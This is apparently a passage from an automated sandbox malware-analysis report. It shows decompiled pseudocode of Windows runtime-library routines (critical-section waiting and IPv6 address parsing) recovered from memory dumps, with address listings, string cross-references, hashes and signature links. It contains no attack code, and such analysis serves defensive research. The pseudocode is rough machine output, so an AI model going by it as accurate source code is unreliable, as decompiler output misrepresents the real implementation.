										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}


























                                                                                                                                                    0x020453ab
                                                                                                                                                    0x020453ae
                                                                                                                                                    0x020453b1
                                                                                                                                                    0x020453b4
                                                                                                                                                    0x020453b7
                                                                                                                                                    0x020605b6
                                                                                                                                                    0x020605c0
                                                                                                                                                    0x020605c3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x020605c9
                                                                                                                                                    0x020605c9
                                                                                                                                                    0x020605cc
                                                                                                                                                    0x020605d5
                                                                                                                                                    0x020605d5
                                                                                                                                                    0x020453bd
                                                                                                                                                    0x020453bd
                                                                                                                                                    0x020453bd
                                                                                                                                                    0x020453be
                                                                                                                                                    0x020453be
                                                                                                                                                    0x020453be
                                                                                                                                                    0x020453c0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02082269
                                                                                                                                                    0x0208226d
                                                                                                                                                    0x02082349
                                                                                                                                                    0x0208234d
                                                                                                                                                    0x02082273
                                                                                                                                                    0x02082276
                                                                                                                                                    0x02082279
                                                                                                                                                    0x0208227e
                                                                                                                                                    0x02082283
                                                                                                                                                    0x02082287
                                                                                                                                                    0x0208228a
                                                                                                                                                    0x0208228d
                                                                                                                                                    0x0208228f
                                                                                                                                                    0x020822bc
                                                                                                                                                    0x020822bc
                                                                                                                                                    0x020822bc
                                                                                                                                                    0x020822be
                                                                                                                                                    0x020822c4
                                                                                                                                                    0x020822cc
                                                                                                                                                    0x020822d0
                                                                                                                                                    0x020822d6
                                                                                                                                                    0x020822d7
                                                                                                                                                    0x020822da
                                                                                                                                                    0x020822df
                                                                                                                                                    0x020822e4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x020822e6
                                                                                                                                                    0x020822e9
                                                                                                                                                    0x020822f4
                                                                                                                                                    0x020822f9
                                                                                                                                                    0x020822fa
                                                                                                                                                    0x02082305
                                                                                                                                                    0x02082314
                                                                                                                                                    0x02082319
                                                                                                                                                    0x0208231a
                                                                                                                                                    0x0208231d
                                                                                                                                                    0x02082320
                                                                                                                                                    0x02082323
                                                                                                                                                    0x02082323
                                                                                                                                                    0x02082328
                                                                                                                                                    0x0208232d
                                                                                                                                                    0x0208232f
                                                                                                                                                    0x02082331
                                                                                                                                                    0x02082336
                                                                                                                                                    0x02082336
                                                                                                                                                    0x0208233b
                                                                                                                                                    0x0208233d
                                                                                                                                                    0x02082350
                                                                                                                                                    0x02082351
                                                                                                                                                    0x02082356
                                                                                                                                                    0x02082359
                                                                                                                                                    0x02082359
                                                                                                                                                    0x0208235b
                                                                                                                                                    0x0208235d
                                                                                                                                                    0x02045367
                                                                                                                                                    0x0204536b
                                                                                                                                                    0x02045372
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02082363
                                                                                                                                                    0x02082363
                                                                                                                                                    0x02082369
                                                                                                                                                    0x0208236a
                                                                                                                                                    0x0208236c
                                                                                                                                                    0x02082371
                                                                                                                                                    0x02082373
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02082379
                                                                                                                                                    0x02082379
                                                                                                                                                    0x0208237a
                                                                                                                                                    0x0208237f
                                                                                                                                                    0x0208237f
                                                                                                                                                    0x02082385
                                                                                                                                                    0x02082386
                                                                                                                                                    0x02082389
                                                                                                                                                    0x0208238e
                                                                                                                                                    0x02082390
                                                                                                                                                    0x02045378
                                                                                                                                                    0x0204537c
                                                                                                                                                    0x02082396
                                                                                                                                                    0x02082396
                                                                                                                                                    0x02082397
                                                                                                                                                    0x0208239c
                                                                                                                                                    0x020823a2
                                                                                                                                                    0x020823a3
                                                                                                                                                    0x020823a6
                                                                                                                                                    0x020823ab
                                                                                                                                                    0x020823ad
                                                                                                                                                    0x00000000
                                                                                                                                                    0x020823b3
                                                                                                                                                    0x020823b3
                                                                                                                                                    0x020823b4
                                                                                                                                                    0x020823b9
                                                                                                                                                    0x020823ba
                                                                                                                                                    0x020823ba
                                                                                                                                                    0x020823bc
                                                                                                                                                    0x020823bf
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02079153
                                                                                                                                                    0x02079158
                                                                                                                                                    0x0207915a
                                                                                                                                                    0x0207915e
                                                                                                                                                    0x02079160
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02079166
                                                                                                                                                    0x02079166
                                                                                                                                                    0x02079171
                                                                                                                                                    0x02079176
                                                                                                                                                    0x02079176
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02079160
                                                                                                                                                    0x020823c6
                                                                                                                                                    0x020823cb
                                                                                                                                                    0x020823ce
                                                                                                                                                    0x020823d7
                                                                                                                                                    0x020823d7
                                                                                                                                                    0x020823ad
                                                                                                                                                    0x02082390
                                                                                                                                                    0x02082373
                                                                                                                                                    0x0208233f
                                                                                                                                                    0x0208233f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0208233f
                                                                                                                                                    0x02082291
                                                                                                                                                    0x02082291
                                                                                                                                                    0x02082293
                                                                                                                                                    0x02082295
                                                                                                                                                    0x0208229a
                                                                                                                                                    0x020822a1
                                                                                                                                                    0x020822a3
                                                                                                                                                    0x020822a7
                                                                                                                                                    0x020822a9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x020822ab
                                                                                                                                                    0x020822ad
                                                                                                                                                    0x020822af
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x020822af
                                                                                                                                                    0x020822b1
                                                                                                                                                    0x020822b4
                                                                                                                                                    0x020822b4
                                                                                                                                                    0x020822b6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x020822b6
                                                                                                                                                    0x0208228f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0208226d
                                                                                                                                                    0x020453cb
                                                                                                                                                    0x020453ce
                                                                                                                                                    0x020453d0
                                                                                                                                                    0x020453d4
                                                                                                                                                    0x020453d6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x020453d8
                                                                                                                                                    0x020453e3
                                                                                                                                                    0x020453ea
                                                                                                                                                    0x020453ea
                                                                                                                                                    0x020453d6
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 020822F4
                                                                                                                                                    Strings
                                                                                                                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 020822FC
                                                                                                                                                    • RTL: Resource at %p, xrefs: 0208230B
                                                                                                                                                    • RTL: Re-Waiting, xrefs: 02082328
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2373658068.0000000002010000.00000040.00000001.sdmp, Offset: 02000000, based on PE: true
                                                                                                                                                    • Associated: 00000009.00000002.2373633873.0000000002000000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373756290.00000000020F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373764469.0000000002100000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373771769.0000000002104000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373777628.0000000002107000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373784031.0000000002110000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373840976.0000000002170000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                    • API String ID: 885266447-871070163
                                                                                                                                                    • Opcode ID: 481190edd16a55b445212cb73dba0f162756dc7d67e167e97031d68ca709f229
                                                                                                                                                    • Instruction ID: dfbec01e3a8eb74ee73d1080983723b68f3603b56d00869ca305239393adb59f
                                                                                                                                                    • Opcode Fuzzy Hash: 481190edd16a55b445212cb73dba0f162756dc7d67e167e97031d68ca709f229
                                                                                                                                                    • Instruction Fuzzy Hash: D751D5B16007066BEB11AB24CCC4FE777D9AF58725F114269ED49DB280EB61E841ABA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0204EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 51%
                                                                                                                                                    			E0204EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E0203DA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x210793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E020216C0(_t39);
				} else {
					_t40 = E0201F9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E02063915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E020201A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x210793c; // 0x0
								_push(_t85);
								_t44 = E02021F28(_t71);
							} else {
								_t44 = E0201F8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E02063915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E020A2306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E0204EC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E02064FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E02073F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E02073F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0x21020c0;
								if(_t85 != 0x21020c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E020A217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E02073F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

































                                                                                                                                                    0x0204ec56
                                                                                                                                                    0x0204ec56
                                                                                                                                                    0x0204ec56
                                                                                                                                                    0x0204ec5c
                                                                                                                                                    0x0204ec64
                                                                                                                                                    0x020823e6
                                                                                                                                                    0x020823eb
                                                                                                                                                    0x020823eb
                                                                                                                                                    0x0204ec6a
                                                                                                                                                    0x0204ec6c
                                                                                                                                                    0x0204ec6f
                                                                                                                                                    0x020823f3
                                                                                                                                                    0x020823f8
                                                                                                                                                    0x020823fa
                                                                                                                                                    0x020823fc
                                                                                                                                                    0x0204ec75
                                                                                                                                                    0x0204ec76
                                                                                                                                                    0x0204ec76
                                                                                                                                                    0x0204ec7b
                                                                                                                                                    0x0204ec7c
                                                                                                                                                    0x0204ec7e
                                                                                                                                                    0x02082406
                                                                                                                                                    0x02082407
                                                                                                                                                    0x0208240c
                                                                                                                                                    0x0208240d
                                                                                                                                                    0x0208240d
                                                                                                                                                    0x0208240d
                                                                                                                                                    0x02082414
                                                                                                                                                    0x02082417
                                                                                                                                                    0x0208241e
                                                                                                                                                    0x02082435
                                                                                                                                                    0x02082438
                                                                                                                                                    0x0208243c
                                                                                                                                                    0x0208243f
                                                                                                                                                    0x02082442
                                                                                                                                                    0x02082443
                                                                                                                                                    0x02082446
                                                                                                                                                    0x02082449
                                                                                                                                                    0x02082453
                                                                                                                                                    0x02082455
                                                                                                                                                    0x0208245b
                                                                                                                                                    0x0208245b
                                                                                                                                                    0x0204eb99
                                                                                                                                                    0x0204eb99
                                                                                                                                                    0x0204eb9c
                                                                                                                                                    0x0204eb9d
                                                                                                                                                    0x0204eb9f
                                                                                                                                                    0x0204eba2
                                                                                                                                                    0x02082465
                                                                                                                                                    0x0208246b
                                                                                                                                                    0x0208246d
                                                                                                                                                    0x0204eba8
                                                                                                                                                    0x0204eba9
                                                                                                                                                    0x0204eba9
                                                                                                                                                    0x0204ebae
                                                                                                                                                    0x0204ebb3
                                                                                                                                                    0x0204ebb9
                                                                                                                                                    0x0204ebbb
                                                                                                                                                    0x02082513
                                                                                                                                                    0x02082514
                                                                                                                                                    0x02082519
                                                                                                                                                    0x0208251b
                                                                                                                                                    0x0204ec2a
                                                                                                                                                    0x0204ec2d
                                                                                                                                                    0x0204ec33
                                                                                                                                                    0x0204ec36
                                                                                                                                                    0x0204ec3a
                                                                                                                                                    0x0204ec3e
                                                                                                                                                    0x0204ec40
                                                                                                                                                    0x0204ec47
                                                                                                                                                    0x0204ec47
                                                                                                                                                    0x0204ec40
                                                                                                                                                    0x020222c6
                                                                                                                                                    0x0204ebc1
                                                                                                                                                    0x0204ebc1
                                                                                                                                                    0x0204ebc5
                                                                                                                                                    0x0204ec9a
                                                                                                                                                    0x0204ec9a
                                                                                                                                                    0x0204ebd6
                                                                                                                                                    0x0204ebd6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0204ebbb
                                                                                                                                                    0x02082477
                                                                                                                                                    0x0208247c
                                                                                                                                                    0x02082486
                                                                                                                                                    0x0208248b
                                                                                                                                                    0x02082496
                                                                                                                                                    0x0208249b
                                                                                                                                                    0x0208249d
                                                                                                                                                    0x020824a0
                                                                                                                                                    0x020824a3
                                                                                                                                                    0x020824aa
                                                                                                                                                    0x020824aa
                                                                                                                                                    0x020824a5
                                                                                                                                                    0x020824a5
                                                                                                                                                    0x020824a5
                                                                                                                                                    0x020824ac
                                                                                                                                                    0x020824af
                                                                                                                                                    0x020824b0
                                                                                                                                                    0x020824b3
                                                                                                                                                    0x020824b9
                                                                                                                                                    0x020824ba
                                                                                                                                                    0x020824bb
                                                                                                                                                    0x020824c6
                                                                                                                                                    0x020824cb
                                                                                                                                                    0x020824cd
                                                                                                                                                    0x020824d0
                                                                                                                                                    0x020824d1
                                                                                                                                                    0x020824d4
                                                                                                                                                    0x020824d6
                                                                                                                                                    0x020824d9
                                                                                                                                                    0x020824d9
                                                                                                                                                    0x020824dc
                                                                                                                                                    0x020824df
                                                                                                                                                    0x020824e1
                                                                                                                                                    0x020824e7
                                                                                                                                                    0x020824e9
                                                                                                                                                    0x020824ec
                                                                                                                                                    0x020824ef
                                                                                                                                                    0x020824f2
                                                                                                                                                    0x020824f2
                                                                                                                                                    0x020824ef
                                                                                                                                                    0x020824e7
                                                                                                                                                    0x020824fa
                                                                                                                                                    0x020824ff
                                                                                                                                                    0x02082501
                                                                                                                                                    0x02082503
                                                                                                                                                    0x02082506
                                                                                                                                                    0x0208250b
                                                                                                                                                    0x0204eb8c
                                                                                                                                                    0x0204eb93
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0204eb93
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0204eb99
                                                                                                                                                    0x0204ec85
                                                                                                                                                    0x0204ec85
                                                                                                                                                    0x0204ec85
                                                                                                                                                    0x00000000

                                                                                                                                                    Strings
                                                                                                                                                    • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 020824BD
                                                                                                                                                    • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0208248D
                                                                                                                                                    • RTL: Re-Waiting, xrefs: 020824FA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2373658068.0000000002010000.00000040.00000001.sdmp, Offset: 02000000, based on PE: true
                                                                                                                                                    • Associated: 00000009.00000002.2373633873.0000000002000000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373756290.00000000020F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373764469.0000000002100000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373771769.0000000002104000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373777628.0000000002107000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373784031.0000000002110000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373840976.0000000002170000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                                                                                                    • API String ID: 0-3177188983
                                                                                                                                                    • Opcode ID: 974c8647554538332bc3f90034eac2b4a144d1a5fe04ba9584f28c57a7e0d2fe
                                                                                                                                                    • Instruction ID: acca8b2cf2e9c23a89d4226f0406b3bbecb87abf975a5971adce43fa11b94ed7
                                                                                                                                                    • Opcode Fuzzy Hash: 974c8647554538332bc3f90034eac2b4a144d1a5fe04ba9584f28c57a7e0d2fe
                                                                                                                                                    • Instruction Fuzzy Hash: C641C4B0A00304AFD720EB68CD88FAB77F9AF44720F208655F9559B2C0D770E941EBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0205FCC9, Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0205FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E0205EE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E0205EE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E0205685D(_t167, 4) == 0) {
								if(E0205685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E0205685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E0205685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E02038980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E0202DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E0205EE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E0205EE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

























                                                                                                                                                    0x0205fcd1
                                                                                                                                                    0x0205fcd6
                                                                                                                                                    0x0205fcd9
                                                                                                                                                    0x0205fcdc
                                                                                                                                                    0x0205fcdf
                                                                                                                                                    0x0205fce2
                                                                                                                                                    0x0205fce5
                                                                                                                                                    0x0205fce8
                                                                                                                                                    0x0205fceb
                                                                                                                                                    0x0205fced
                                                                                                                                                    0x0205fced
                                                                                                                                                    0x0205fcf3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0205fcfc
                                                                                                                                                    0x0205fcfe
                                                                                                                                                    0x0205fdc1
                                                                                                                                                    0x0208ecbd
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0208eccc
                                                                                                                                                    0x0208eccc
                                                                                                                                                    0x0208ecd2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0208ecdf
                                                                                                                                                    0x0208ece0
                                                                                                                                                    0x0208ece4
                                                                                                                                                    0x0208eceb
                                                                                                                                                    0x0208ecee
                                                                                                                                                    0x0208eca8
                                                                                                                                                    0x0208eca8
                                                                                                                                                    0x0208ecaa
                                                                                                                                                    0x0205fd76
                                                                                                                                                    0x0205fd79
                                                                                                                                                    0x0205fdb4
                                                                                                                                                    0x0205fdb5
                                                                                                                                                    0x0205fdb6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0205fdb6
                                                                                                                                                    0x0205fd7e
                                                                                                                                                    0x0208ecfc
                                                                                                                                                    0x0205fe2f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0205fe2f
                                                                                                                                                    0x0208ed08
                                                                                                                                                    0x0208ed0f
                                                                                                                                                    0x0208ed17
                                                                                                                                                    0x0208ed1b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0208ed1b
                                                                                                                                                    0x0205fd88
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0205fd94
                                                                                                                                                    0x0205fd99
                                                                                                                                                    0x0205fda1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0205fdb0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0205fdb0
                                                                                                                                                    0x0208ecbd
                                                                                                                                                    0x0205fdc7
                                                                                                                                                    0x0205fdcb
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0205fdd7
                                                                                                                                                    0x0205fde3
                                                                                                                                                    0x0205fe06
                                                                                                                                                    0x02071fe7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02071fef
                                                                                                                                                    0x02071ff0
                                                                                                                                                    0x02071ff4
                                                                                                                                                    0x02071ff7
                                                                                                                                                    0x02071ffa
                                                                                                                                                    0x02071ffd
                                                                                                                                                    0x02072000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0208ecf1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0208ecf1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0205fe06
                                                                                                                                                    0x0205fde8
                                                                                                                                                    0x0205fdec
                                                                                                                                                    0x0205fdef
                                                                                                                                                    0x0205fdf2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0205fdf2
                                                                                                                                                    0x0205fdcb
                                                                                                                                                    0x0205fd04
                                                                                                                                                    0x0205fd05
                                                                                                                                                    0x0208ec67
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0208ec6f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0208ec6f
                                                                                                                                                    0x0205fd13
                                                                                                                                                    0x0205fd3c
                                                                                                                                                    0x0205fd40
                                                                                                                                                    0x0208ec75
                                                                                                                                                    0x0208ec7a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0208ec8a
                                                                                                                                                    0x0208ec8a
                                                                                                                                                    0x0208ec90
                                                                                                                                                    0x0208ecb2
